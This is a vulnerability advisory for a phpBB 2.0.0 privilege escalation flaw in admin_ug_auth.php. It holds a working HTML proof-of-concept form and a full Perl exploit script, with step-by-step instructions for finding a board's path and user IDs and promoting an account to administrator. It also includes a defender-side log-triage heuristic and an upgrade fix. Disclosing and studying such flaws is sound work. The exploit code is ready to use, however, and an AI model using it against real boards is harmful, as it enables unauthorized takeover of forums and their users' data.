phpBB 2.0.0 User Privilege Escalation Vulnerability
Program involved:
phpBB 2.0.0
Description:
phpBB 2.0.0 User Privilege Escalation Vulnerability
Details:
phpBB is a UBB-style discussion board written in PHP on top of a MySQL database. It supports posting, replying to and editing messages, private messages, personal forums, registered and anonymous posting, threaded topics, user listings ordered by submission or other criteria, configurable administration, moderation and more.
A security flaw has been found in phpBB 2.0.0 that allows any malicious ordinary user to raise their own privileges to administrator level and gain full control of the system.
The flaw is caused by a coding error in the script admin_ug_auth.php in phpBB 2.0.0. In phpBB 2.0.0, admin_ug_auth.php is used to set user permissions. Normally only an account with administrator privileges should be able to use admin_ug_auth.php, but the script does not question invalid data submitted by an ordinary user. So if an attacker knows what kind of request the board expects, they can simply submit the action they want executed directly, for example a request to promote a particular account to administrator. Below is an HTML proof-of-concept:
------------------
<html>
<head>
</head>
<body>
<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
To use the code above successfully, an attacker must first obtain two basic pieces of information:
1. The base directory of the board, e.g. http://www.mydomain.com/phpBB2 .
2. The user number of the account to be promoted.
Note that after the account has been escalated, the user should log out of the board and log back in promptly; otherwise the session will soon end up with incorrect permissions.
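As an added illustration from the defender's side (not part of the advisory or of phpBB's own code): a log-triage heuristic that flags POST requests to admin_ug_auth.php whose Referer is not a page of the board's own admin panel, which is where a legitimate permission change originates. It assumes an Apache/NGINX combined-format access log and a constructed deployment with host board.example and base directory /phpBB2.

```python
import re
from urllib.parse import urlparse

# Assumed (constructed) deployment values: the board's host and base directory.
SITE_HOST = "board.example"
BOARD_BASE = "/phpBB2"
TARGET = BOARD_BASE + "/admin/admin_ug_auth.php"

# Apache/NGINX "combined" format:
#   host ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious(rec, site_host=SITE_HOST):
    """A legitimate change is submitted from the board's own admin panel, so its
    Referer is a page under BOARD_BASE/admin/ on this host; a POST to the script
    from anywhere else (or with no Referer at all) is worth triage."""
    if rec is None or rec["method"] != "POST":
        return False
    if urlparse(rec["path"]).path != TARGET:
        return False
    ref = urlparse(rec["referer"])
    return not (ref.hostname == site_host
                and ref.path.startswith(BOARD_BASE + "/admin/"))

def scan(lines, site_host=SITE_HOST):
    """Parsed records that the heuristic flags, in log order."""
    return [r for r in map(parse_line, lines) if is_suspicious(r, site_host)]

# Constructed sample log: one admin-panel submission, two off-panel POSTs, one page view.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jul/2002:12:00:01 +0000] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.1" 200 512 '
    '"http://board.example/phpBB2/admin/admin_ug_auth.php?mode=user&u=2" "Mozilla/4.0"',
    '10.0.0.9 - - [10/Jul/2002:12:05:42 +0000] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.1" 200 512 '
    '"-" "libwww-perl/5.64"',
    '10.0.0.9 - - [10/Jul/2002:12:06:03 +0000] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.1" 200 512 '
    '"http://other.example/form.html" "Mozilla/4.0"',
    '10.0.0.7 - - [10/Jul/2002:12:07:00 +0000] "GET /phpBB2/viewtopic.php?t=1 HTTP/1.1" 200 2048 '
    '"http://board.example/phpBB2/index.php" "Mozilla/4.0"',
]
```

Calling scan(SAMPLE_LOG) returns the two off-panel POSTs from 10.0.0.9. A client can omit or forge the Referer, so this only prioritises what to review; the actual fix is the upgrade given under Solution.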
Affected programs:
phpBB 2.0.0
Unaffected programs:
Versions of phpBB later than 2.0.0
Attack method:
The "Details" section contains the HTML attack code; below is the Perl attack code:
#!/usr/bin/perl
################################################################
# Copyright 2002 nick84 - Rootsecure.net #
# #
# You may use / modified this code as long as you leave this #
# here message in the source. #
# By using this code you agree to indemnify rootsecure.net #
# from any liability that might arise from its use. #
# #
# Selling this source code without prior consent is expressly #
# forbidden. :) #
# #
# By downloading this code you agree not to use it for any #
# illegal purpose. I.e. Only on forums you already have #
# administration rights over. #
# #
################################################################
# Header Info
print "Content-type: text/html\n\n";
print "root_a_phpBB_2.0.0.pl perl command line version\n";
print "Coded by nick84@ (http://www.rootsecure.net)\n\n";
# Usage Instructions Shown On Screen
print <<ENDHTML;
Usage Instructions (data gathering)
------------------
1. Goto the board you wish to change the permissions for in the normal way
using a browser.
2. Find the base directory location of the board for the script,
i.e. if the main page was http://www.server.com/phpBB2/index.php
the base directory location would be http://www.server.com/phpBB2
- without the trailing slash
3. Goto the boards "Memberlist" page (usually located at the top with the
rest of the links)
4. Search the "Memberlist" page for the specific account you wish to change
the permissions for, and click the username, then note down the number
at the end of the page URL you are at. (u=?)
5. Fill in the details obtained where asked for in the following prompts.
ENDHTML
# Continue When user Is Ready
print "Press enter to continue:";
$continue = <STDIN>;
# Clear The Screen
&clear_screen;
# Get Input From User
print "Boards Location:\n";
print "----------------\n";
print "e.g. (http://www.domain_name.com/phpBB2 Note: no trailing slash)\n";
print "Dont forget to use capitals if the name contains them\n";
print ":";
$board_location = <STDIN>;
chop $board_location;
print "\nUser ID:\n";
print "--------\n";
print "User ID of the user you wish to change the permissions for\n";
print "Found by clicking your profile on the Memberlist page, and\n";
print "then reading the end of the URL (where it says u=?)\n";
print ":";
$user_id = <STDIN>;
chop $user_id;
print "\nUser Level:\n";
print "-----------\n";
print "User level you wish to give to the specified user\n";
print "i.e. for admin type admin for user type user\n";
print ":";
$user_level = <STDIN>;
chop $user_level;
# Clear The Screen
&clear_screen;
# Print Out What The User Entered
print <<ENDHTML;
Details Entered
---------------
Board Location: $board_location
User ID No.: $user_id
User Level: $user_level
ENDHTML
# Confirm Details With User
print "\nIs this correct? (if it is press enter, otherwise controll-c)\n";
print ":";
$continue = <STDIN>;
print "\nWorking ...\n";
# Add One To Get The Correct User ID (not needed anymore)
#$user_id++;
# Compile Full String To Send
$post_dat="adv=&mode=user&moderator%5B1%5D=0&private%5B1%5D=0&submit=Submit&u=$user_id&userlevel=$user_level";
# Compile Full Location Of Boards Admin Page
$full_location="$board_location/admin/admin_ug_auth.php";
# Change Permissions On Specified Server
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => $full_location);
$req->content_type('application/x-www-form-urlencoded');
$req->content($post_dat);
my $res = $ua->request($req);
# Clear The Screen
&clear_screen;
print "\nFinished!\n";
# Display Final Usage Instructions
print <<ENDHTML;
Now go and log into the forum in the usual way. - If it was successful,
there will be a link at the bottom of every board page saying "Go to
Administration Panel" and additional options will appear on screen when
you are viewing a specific thread to enable you to edit or delete posts
in it etc.
ENDHTML
# print $res->as_string;
# Clear The Screen Subroutine
sub clear_screen {
for ($count=1; $count<101; $count++)
{
print "\n";
}
}
Solution:
Upgrade to a version of phpBB later than 2.0.0.